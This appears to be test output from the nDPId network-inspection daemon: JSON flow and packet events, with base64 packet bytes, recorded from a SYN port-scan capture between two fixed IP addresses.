+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsrPEAADMGaIGsEAAIQA2GNIzTAFjdU4MZAAAAAGACEAAoNAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAs5rAAADcGKsKsEAAIQA2GNIzTBAvdU4MZAAAAAGACEAAkgQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsVR8AAC0GxlOsEAAIQA2GNIzTTiDdU4MZAAAAAGACCADiawAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAs7JwAACgGM9asEAAIQA2GNIzTCI\/dU4MZAAAAAGACBAAr\/QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsVPkAACcGzHmsEAAIQA2GNIzTBHndU4MZAAAAAGACEAAkEwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsGHUAACwGA\/6sEAAIQA2GNIzTDNPdU4MZAAAAAGACBAAnuQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsE9wAADUG\/5asEAAIQA2GNIzTBUjdU4MZAAAAAGACCAArRAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsnvwAACgGgXasEAAIQA2GNIzTAh3dU4MZAAAAAGACBAAybwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAs89cAACoGKpusEAAIQA2GNIzT387dU4MZAAAAAGACDABMvQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060597,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_packet_id":1,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060597,"pkt":"ACYLMQczACWzv5HuCABFAAAs1hEAADoGOGGsEAAIQA2GNIzTBQfdU4MZAAAAAGACDAAnhQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060597,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_packet_id":1,"flow_last_seen":1278275060597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060597,"pkt":"ACYLMQczACWzv5HuCABFAAAsoEYAADMGdSysEAAIQA2GNIzTABTdU4MZAAAAAGACEAAoeAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060598,"flow_last_seen":1278275060598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060598,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_packet_id":1,"flow_last_seen":1278275060598,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060598,"pkt":"ACYLMQczACWzv5HuCABFAAAsPSsAACcG5EesEAAIQA2GNIzTPvHdU4MZAAAAAGACEADpmgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAs6VAAADkGJiKsEAAIQA2GNIzTCf3dU4MZAAAAAGACCAAmjwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAspgEAADUGbXGsEAAIQA2GNIzTDJXdU4MZAAAAAGACCAAj9wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsExMAADIGA2CsEAAIQA2GNIzTAFHdU4MZAAAAAGACDAAsOwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsn2EAACsGfhGsEAAIQA2GNIzSDzHdUoMYAAAAAGACEAAZXgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAs4qcAADsGKsusEAAIQA2GNIzSGaXdUoMYAAAAAGACEAAO6gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsIwwAACcG\/masEAAIQA2GNIzSB9fdUoMYAAAAAGACEAAguAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAs8L8AADYGIbOsEAAIQA2GNIzSDMXdUoMYAAAAAGACDAAfygAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAstuoAADMGXoisEAAIQA2GNIzSA+jdUoMYAAAAAGACEAAkpwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsXSkAADsGsEmsEAAIQA2GNIzSCbzdUoMYAAAAAGACEAAe0wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsPRsAADsG0FesEAAIQA2GNIzSCpbdUoMYAAAAAGACEAAd+QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsWbIAACUGycCsEAAIQA2GNIzSE4zdUoMYAAAAAGACCAAdAwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsW3wAADkGs\/asEAAIQA2GNIzSHRPdUoMYAAAAAGACCAATfAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsRWcAADIG0QusEAAIQA2GNIzSatjdUoMYAAAAAGACDADBtgAAAgQFtA=="} 